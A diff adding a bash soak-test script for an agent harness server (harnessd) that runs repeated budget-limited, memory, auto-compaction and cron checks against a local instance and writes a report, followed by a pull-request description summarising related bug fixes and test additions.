+    total=$(( total + ${BASH_REMATCH[1]} ))
+    remaining=""
+  fi
+
+  if [[ -n "$remaining" ]]; then
+    echo "[soak] ERROR: cannot parse duration '${dur}' (unparsed: '${remaining}')" >&2
+    return 1
+  fi
+
+  echo "$total"
+}
+
+DURATION_SECS="$(parse_duration "${DURATION}")"
+log "soak duration: ${DURATION} (${DURATION_SECS}s)"
+
+# ---------------------------------------------------------------------------
+# Paths and dirs
+# ---------------------------------------------------------------------------
+
+BINARY="${SOAK_BINARY:-${REPO_ROOT}/harnessd}"
+LOG_DIR="${REPO_ROOT}/soak-reports"
+TIMESTAMP="$(date +%Y%m%d-%H%M%S)"
+HARNESS_LOG="${LOG_DIR}/${TIMESTAMP}-harnessd.log"
+REPORT="${LOG_DIR}/${TIMESTAMP}-soak.md"
+
+HARNESS_CONFIG_DIR="${REPO_ROOT}/.harness"
+HARNESS_CONFIG="${HARNESS_CONFIG_DIR}/config.toml"
+HARNESS_CONFIG_BACKUP="${HARNESS_CONFIG_DIR}/config.toml.soak.bak"
+
+mkdir -p "${LOG_DIR}"
+
+# ---------------------------------------------------------------------------
+# Port selection
+# ---------------------------------------------------------------------------
+
+if [[ -z "${PORT}" ]]; then
+  PORT=$(( ( RANDOM % 10000 ) + 50000 ))
+fi
+BASE_URL="http://localhost:${PORT}"
+log "harnessd port: ${PORT}"
+
+# ---------------------------------------------------------------------------
+# State
+# ---------------------------------------------------------------------------
+
+SERVER_PID=""
+CONFIG_BACKED_UP=0
+
+# ---------------------------------------------------------------------------
+# Cleanup trap (restores config, stops harnessd)
+# ---------------------------------------------------------------------------
+
+cleanup() {
+  local exit_code=$?
+
+  # Restore workspace config if we backed it up.
+  if [[ "${CONFIG_BACKED_UP}" -eq 1 ]]; then
+    if [[ -f "${HARNESS_CONFIG_BACKUP}" ]]; then
+      log "restoring workspace config from backup..."
+      mv -f "${HARNESS_CONFIG_BACKUP}" "${HARNESS_CONFIG}" 2>/dev/null || \
+        log "WARN: could not restore config backup"
+    else
+      # We created the file from scratch — remove it.
+      rm -f "${HARNESS_CONFIG}" 2>/dev/null || true
+      # Remove the dir if it is now empty and didn't exist before.
+      rmdir "${HARNESS_CONFIG_DIR}" 2>/dev/null || true
+    fi
+    CONFIG_BACKED_UP=0
+  fi
+
+  if [[ -n "${SERVER_PID}" ]]; then
+    log "stopping harnessd (pid=${SERVER_PID})..."
+    kill "${SERVER_PID}" 2>/dev/null || true
+    wait "${SERVER_PID}" 2>/dev/null || true
+    SERVER_PID=""
+  fi
+
+  # Write final report footer.
+  if [[ -f "${REPORT}" ]]; then
+    {
+      echo ""
+      echo "---"
+      echo ""
+      echo "## Final Summary"
+      echo ""
+      echo "| Metric | Value |"
+      echo "|--------|-------|"
+      echo "| Stopped at | $(date) |"
+      echo "| Iterations | ${ITERATION} |"
+      echo "| PASS | ${SOAK_PASS} |"
+      echo "| FAIL | ${SOAK_FAIL} |"
+      echo "| SKIP | ${SOAK_SKIP} |"
+      echo "| Exit code | ${exit_code} |"
+    } >> "${REPORT}"
+    log "report written to: ${REPORT}"
+  fi
+}
+trap cleanup EXIT
+
+# ---------------------------------------------------------------------------
+# Write soak config (tiny auto_compact context window so compaction fires)
+# ---------------------------------------------------------------------------
+
+log "writing soak workspace config (tiny context window for auto_compact)..."
+mkdir -p "${HARNESS_CONFIG_DIR}"
+
+if [[ -f "${HARNESS_CONFIG}" ]]; then
+  cp -f "${HARNESS_CONFIG}" "${HARNESS_CONFIG_BACKUP}"
+  log "backed up existing workspace config to: ${HARNESS_CONFIG_BACKUP}"
+fi
+CONFIG_BACKED_UP=1
+
+cat > "${HARNESS_CONFIG}" <<'TOML'
+# Soak test workspace config — written by scripts/soak.sh
+# Restored automatically via trap on exit.
+
+[auto_compact]
+enabled = true
+mode = "strip"
+# Tiny context window so compaction fires during normal soak runs.
+model_context_window = 2000
+threshold = 0.50
+keep_last = 2
+
+[memory]
+enabled = true
+mode = "auto"
+default_enabled = true
+observe_min_tokens = 1
+TOML
+
+log "soak config written: ${HARNESS_CONFIG}"
+
+# ---------------------------------------------------------------------------
+# Build harnessd (if binary not already present)
+# ---------------------------------------------------------------------------
+
+if [[ ! -x "${BINARY}" ]]; then
+  log "building harnessd..."
+  cd "${REPO_ROOT}"
+  go build -o "${BINARY}" ./cmd/harnessd
+  log "build complete: ${BINARY}"
+fi
+
+# ---------------------------------------------------------------------------
+# Start harnessd in background (auth disabled)
+# ---------------------------------------------------------------------------
+
+log "starting harnessd on :${PORT} (auth disabled)..."
+HARNESS_ADDR=":${PORT}" \
+  HARNESS_AUTH_DISABLED=true \
+  HARNESS_PROJECT_CONFIG="${HARNESS_CONFIG}" \
+  "${BINARY}" \
+  > "${HARNESS_LOG}" 2>&1 &
+SERVER_PID=$!
+log "harnessd pid=${SERVER_PID}, log=${HARNESS_LOG}"
+
+# ---------------------------------------------------------------------------
+# Wait for /healthz
+# ---------------------------------------------------------------------------
+
+log "waiting for /healthz (up to 30s)..."
+HEALTH_WAITED=0
+while true; do
+  if curl -sf "${BASE_URL}/healthz" >/dev/null 2>&1; then
+    log "/healthz ready"
+    break
+  fi
+  HEALTH_WAITED=$(( HEALTH_WAITED + 1 ))
+  if [[ "${HEALTH_WAITED}" -ge 30 ]]; then
+    log "ERROR: harnessd did not respond within 30s"
+    tail -20 "${HARNESS_LOG}" >&2 || true
+    exit 1
+  fi
+  sleep 1
+done
+
+# ---------------------------------------------------------------------------
+# Resolve a working model from /v1/models (prefer the requested MODEL)
+# ---------------------------------------------------------------------------
+
+log "resolving model via /v1/models..."
+MODELS_BODY="$(curl -sf "${BASE_URL}/v1/models" || echo '{}')"
+RESOLVED_MODEL="$(echo "${MODELS_BODY}" | python3 -c "
+import sys, json, os
+target = os.environ.get('SOAK_MODEL_NAME', '')
+data = json.load(sys.stdin)
+models = data if isinstance(data, list) else data.get('models', [])
+ids = [m.get('id', '') for m in models]
+# Prefer the requested model if present.
+if target and target in ids:
+    print(target)
+elif ids:
+    print(ids[0])
+else:
+    print('')
+" SOAK_MODEL_NAME="${MODEL}" 2>/dev/null || echo "")"
+
+if [[ -z "${RESOLVED_MODEL}" ]]; then
+  log "WARN: could not resolve model from /v1/models — using configured value: ${MODEL}"
+  RESOLVED_MODEL="${MODEL}"
+fi
+log "model: ${RESOLVED_MODEL}"
+
+# ---------------------------------------------------------------------------
+# Create a cron job for the soak (fires every minute; we'll poll its last-run)
+# ---------------------------------------------------------------------------
+
+CRON_JOB_ID=""
+log "creating cron job (every 1 minute)..."
+CRON_RESP="$(curl -sf -X POST "${BASE_URL}/v1/cron/jobs" \
+  -H "Content-Type: application/json" \
+  -d "{
+    \"schedule\": \"* * * * *\",
+    \"model\": \"${RESOLVED_MODEL}\",
+    \"prompt\": \"Respond with the single word: SOAK_CRON_OK\",
+    \"max_steps\": 1
+  }" 2>/dev/null || echo "{}")"
+
+CRON_JOB_ID="$(echo "${CRON_RESP}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('id', data.get('job_id', '')))
+" 2>/dev/null || echo "")"
+
+if [[ -n "${CRON_JOB_ID}" ]]; then
+  log "cron job created: id=${CRON_JOB_ID}"
+else
+  log "WARN: cron endpoint not available or returned no id (response: ${CRON_RESP:0:120}) — cron checks will be skipped"
+fi
+
+# ---------------------------------------------------------------------------
+# Initialise soak report
+# ---------------------------------------------------------------------------
+
+cat > "${REPORT}" <<MDEOF
+# Soak Report — ${TIMESTAMP}
+
+**Started:** $(date)
+**Duration target:** ${DURATION} (${DURATION_SECS}s)
+**Model:** ${RESOLVED_MODEL}
+**Server:** ${BASE_URL}
+**Harnessd log:** ${HARNESS_LOG}
+
+---
+
+MDEOF
+
+log "report initialised: ${REPORT}"
+
+# ---------------------------------------------------------------------------
+# Helper: poll a run to completion (timeout 120s)
+# ---------------------------------------------------------------------------
+
+# poll_run <run_id>
+# Echoes the final status to stdout. Writes progress to stderr.
+poll_run() {
+  local run_id="$1"
+  local elapsed=0
+  local status=""
+  while true; do
+    local body
+    body="$(curl -sf "${BASE_URL}/v1/runs/${run_id}" 2>/dev/null || echo '{}')"
+    status="$(echo "${body}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('status', ''))
+" 2>/dev/null || echo "")"
+
+    case "${status}" in
+      completed|failed|cancelled)
+        echo "${status}"
+        return 0
+        ;;
+    esac
+
+    elapsed=$(( elapsed + 2 ))
+    if [[ "${elapsed}" -ge 120 ]]; then
+      echo "timeout"
+      return 0
+    fi
+    sleep 2
+  done
+}
+
+# ---------------------------------------------------------------------------
+# Helper: append a run summary block to the report
+# ---------------------------------------------------------------------------
+
+# append_run_summary <iteration> <label> <run_id> <status> <elapsed_s>
+append_run_summary() {
+  local iteration="$1"
+  local label="$2"
+  local run_id="$3"
+  local status="$4"
+  local elapsed_s="$5"
+
+  {
+    echo ""
+    echo "### Iter ${iteration}: ${label}"
+    echo ""
+    echo "| Field | Value |"
+    echo "|-------|-------|"
+    echo "| run_id | \`${run_id}\` |"
+    echo "| status | ${status} |"
+    echo "| elapsed_s | ${elapsed_s} |"
+    echo "| timestamp | $(date) |"
+    echo ""
+  } >> "${REPORT}"
+}
+
+# ---------------------------------------------------------------------------
+# Soak loop
+# ---------------------------------------------------------------------------
+
+SOAK_START="$(date +%s)"
+DEADLINE=$(( SOAK_START + DURATION_SECS ))
+
+# Reuse one conversation_id for multi-turn memory runs.
+MEMORY_CONV_ID="soak-conv-${TIMESTAMP}"
+
+log "starting soak loop — deadline in ${DURATION_SECS}s"
+
+{
+  echo "## Soak Iterations"
+  echo ""
+} >> "${REPORT}"
+
+while true; do
+  NOW="$(date +%s)"
+  if [[ "${NOW}" -ge "${DEADLINE}" ]]; then
+    log "deadline reached — stopping soak loop"
+    break
+  fi
+  REMAINING=$(( DEADLINE - NOW ))
+
+  ITERATION=$(( ITERATION + 1 ))
+  log "--- iteration ${ITERATION} (${REMAINING}s remaining) ---"
+
+  # -------------------------------------------------------------------------
+  # Exercise 1: Budget-limited run (low max_cost_usd — expect completed or
+  # cost_limit_reached; both are acceptable outcomes in a soak).
+  # -------------------------------------------------------------------------
+
+  ITER_START="$(date +%s)"
+  log "  [1] budget-limited run..."
+  BUDGET_RUN_RESP="$(curl -sf -X POST "${BASE_URL}/v1/runs" \
+    -H "Content-Type: application/json" \
+    -d "{
+      \"model\": \"${RESOLVED_MODEL}\",
+      \"prompt\": \"Reply with exactly: SOAK_BUDGET_OK\",
+      \"max_cost_usd\": 0.001,
+      \"max_steps\": 3
+    }" 2>/dev/null || echo "{}")"
+
+  BUDGET_RUN_ID="$(echo "${BUDGET_RUN_RESP}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('run_id', data.get('id', '')))
+" 2>/dev/null || echo "")"
+
+  if [[ -n "${BUDGET_RUN_ID}" ]]; then
+    BUDGET_STATUS="$(poll_run "${BUDGET_RUN_ID}")"
+    ITER_ELAPSED=$(( $(date +%s) - ITER_START ))
+    case "${BUDGET_STATUS}" in
+      completed|failed)
+        pass "budget-limited run ${BUDGET_RUN_ID} → ${BUDGET_STATUS}"
+        ;;
+      timeout)
+        fail "budget-limited run ${BUDGET_RUN_ID} timed out"
+        ;;
+      *)
+        # cost_limit_reached is an acceptable terminal state for a soak.
+        pass "budget-limited run ${BUDGET_RUN_ID} → ${BUDGET_STATUS} (accepted)"
+        ;;
+    esac
+    append_run_summary "${ITERATION}" "budget-limited" \
+      "${BUDGET_RUN_ID}" "${BUDGET_STATUS}" "${ITER_ELAPSED}"
+  else
+    fail "budget-limited run: no run_id returned (response: ${BUDGET_RUN_RESP:0:80})"
+    skip "budget-limited run summary (no id)"
+  fi
+
+  # -------------------------------------------------------------------------
+  # Exercise 2: Multi-turn memory run (reuse same conversation_id)
+  # -------------------------------------------------------------------------
+
+  ITER_START="$(date +%s)"
+  log "  [2] multi-turn memory run (conv=${MEMORY_CONV_ID})..."
+  MEMORY_RUN_RESP="$(curl -sf -X POST "${BASE_URL}/v1/runs" \
+    -H "Content-Type: application/json" \
+    -d "{
+      \"model\": \"${RESOLVED_MODEL}\",
+      \"prompt\": \"Reply with exactly: SOAK_MEMORY_OK\",
+      \"conversation_id\": \"${MEMORY_CONV_ID}\",
+      \"max_steps\": 5
+    }" 2>/dev/null || echo "{}")"
+
+  MEMORY_RUN_ID="$(echo "${MEMORY_RUN_RESP}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('run_id', data.get('id', '')))
+" 2>/dev/null || echo "")"
+
+  if [[ -n "${MEMORY_RUN_ID}" ]]; then
+    MEMORY_STATUS="$(poll_run "${MEMORY_RUN_ID}")"
+    ITER_ELAPSED=$(( $(date +%s) - ITER_START ))
+    if [[ "${MEMORY_STATUS}" == "completed" ]] || [[ "${MEMORY_STATUS}" == "failed" ]]; then
+      pass "memory run ${MEMORY_RUN_ID} → ${MEMORY_STATUS}"
+    else
+      fail "memory run ${MEMORY_RUN_ID} → ${MEMORY_STATUS}"
+    fi
+    append_run_summary "${ITERATION}" "multi-turn-memory" \
+      "${MEMORY_RUN_ID}" "${MEMORY_STATUS}" "${ITER_ELAPSED}"
+  else
+    fail "memory run: no run_id returned (response: ${MEMORY_RUN_RESP:0:80})"
+    skip "memory run summary (no id)"
+  fi
+
+  # -------------------------------------------------------------------------
+  # Exercise 3: Auto-compact run (small prompt over multiple steps so the tiny
+  # context window has a chance to trigger compaction)
+  # -------------------------------------------------------------------------
+
+  ITER_START="$(date +%s)"
+  log "  [3] auto-compact run..."
+  COMPACT_RUN_RESP="$(curl -sf -X POST "${BASE_URL}/v1/runs" \
+    -H "Content-Type: application/json" \
+    -d "{
+      \"model\": \"${RESOLVED_MODEL}\",
+      \"prompt\": \"Count from 1 to 5, one number per sentence. After listing all numbers, reply: SOAK_COMPACT_OK\",
+      \"max_steps\": 8
+    }" 2>/dev/null || echo "{}")"
+
+  COMPACT_RUN_ID="$(echo "${COMPACT_RUN_RESP}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('run_id', data.get('id', '')))
+" 2>/dev/null || echo "")"
+
+  if [[ -n "${COMPACT_RUN_ID}" ]]; then
+    COMPACT_STATUS="$(poll_run "${COMPACT_RUN_ID}")"
+    ITER_ELAPSED=$(( $(date +%s) - ITER_START ))
+    if [[ "${COMPACT_STATUS}" == "completed" ]] || [[ "${COMPACT_STATUS}" == "failed" ]]; then
+      pass "auto-compact run ${COMPACT_RUN_ID} → ${COMPACT_STATUS}"
+    else
+      fail "auto-compact run ${COMPACT_RUN_ID} → ${COMPACT_STATUS}"
+    fi
+    append_run_summary "${ITERATION}" "auto-compact" \
+      "${COMPACT_RUN_ID}" "${COMPACT_STATUS}" "${ITER_ELAPSED}"
+  else
+    fail "auto-compact run: no run_id returned (response: ${COMPACT_RUN_RESP:0:80})"
+    skip "auto-compact run summary (no id)"
+  fi
+
+  # -------------------------------------------------------------------------
+  # Exercise 4: Check cron job last-run timestamp (if cron is available)
+  # -------------------------------------------------------------------------
+
+  if [[ -n "${CRON_JOB_ID}" ]]; then
+    log "  [4] polling cron job ${CRON_JOB_ID}..."
+    CRON_JOB_BODY="$(curl -sf "${BASE_URL}/v1/cron/jobs/${CRON_JOB_ID}" 2>/dev/null || echo "{}")"
+    CRON_LAST_RUN="$(echo "${CRON_JOB_BODY}" | python3 -c "
+import sys, json
+data = json.load(sys.stdin)
+print(data.get('last_run_at', data.get('last_fired_at', '')))
+" 2>/dev/null || echo "")"
+    if [[ -n "${CRON_LAST_RUN}" ]]; then
+      pass "cron job ${CRON_JOB_ID} has last_run_at=${CRON_LAST_RUN}"
+    else
+      # Cron may not have fired yet in early iterations — not a failure.
+      log "  cron job ${CRON_JOB_ID}: no last_run_at yet (next_run_at may be in the future)"
+    fi
+  else
+    skip "cron check (no cron job id)"
+  fi
+
+  # -------------------------------------------------------------------------
+  # Inter-iteration pause (avoid hammering the API)
+  # -------------------------------------------------------------------------
+
+  LOOP_SLEEP=10
+  NOW="$(date +%s)"
+  REMAINING=$(( DEADLINE - NOW ))
+  if [[ "${REMAINING}" -le 0 ]]; then
+    log "deadline reached after iteration ${ITERATION}"
+    break
+  fi
+  if [[ "${LOOP_SLEEP}" -gt "${REMAINING}" ]]; then
+    LOOP_SLEEP="${REMAINING}"
+  fi
+
+  log "  sleeping ${LOOP_SLEEP}s before next iteration..."
+  sleep "${LOOP_SLEEP}"
+done
+
+# ---------------------------------------------------------------------------
+# Cleanup cron job (best-effort)
+# ---------------------------------------------------------------------------
+
+if [[ -n "${CRON_JOB_ID}" ]]; then
+  log "deleting cron job ${CRON_JOB_ID}..."
+  curl -sf -X DELETE "${BASE_URL}/v1/cron/jobs/${CRON_JOB_ID}" >/dev/null 2>&1 || true
+fi
+
+# ---------------------------------------------------------------------------
+# Final status line
+# ---------------------------------------------------------------------------
+
+log ""
+log "============================================"
+log " Soak Complete"
+log "============================================"
+log " Iterations : ${ITERATION}"
+log " PASS       : ${SOAK_PASS}"
+log " FAIL       : ${SOAK_FAIL}"
+log " SKIP       : ${SOAK_SKIP}"
+log " Report     : ${REPORT}"
+log "============================================"
+
+if [[ "${SOAK_FAIL}" -gt 0 ]]; then
+  exit 1
+fi
+exit 0


### PR DESCRIPTION
Adds an end-to-end runtime-validation suite across five areas — reliability, isolation & governance, forensics & replay, autonomy, and market proof — plus the production fixes the new tests surfaced. Real bugs fixed: three cross-tenant isolation holes (by-id run access, conversation-runs leak, replay path/tenant), a worker-pool `Runner.Shutdown` goroutine-leak/deadlock, missing runtime provider fallback, a replayer `output`/`result` key bug, callback lifecycle events that were never emitted (with a tenant/agent fire bug and a per-conversation slot leak), a cron `NextRunAt` bug, and two `cloudscheduler` data/timing races (including the `StartedAt`/`CompletedAt` aliasing behind the failing Docker test). New capabilities: a reusable `internal/fakeprovider`, `Runner.Shutdown`, opt-in replay drift detection, a grounded `internal/benchresult` schema, deterministic in-process + key-free shell smokes, a comparison-harness shape, and an optional `scripts/soak.sh`. The whole tree passes `go build`, `go vet`, and `go test ./...` including `-race`; the market-proof artifacts use only real fields with no fabricated benchmark numbers.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
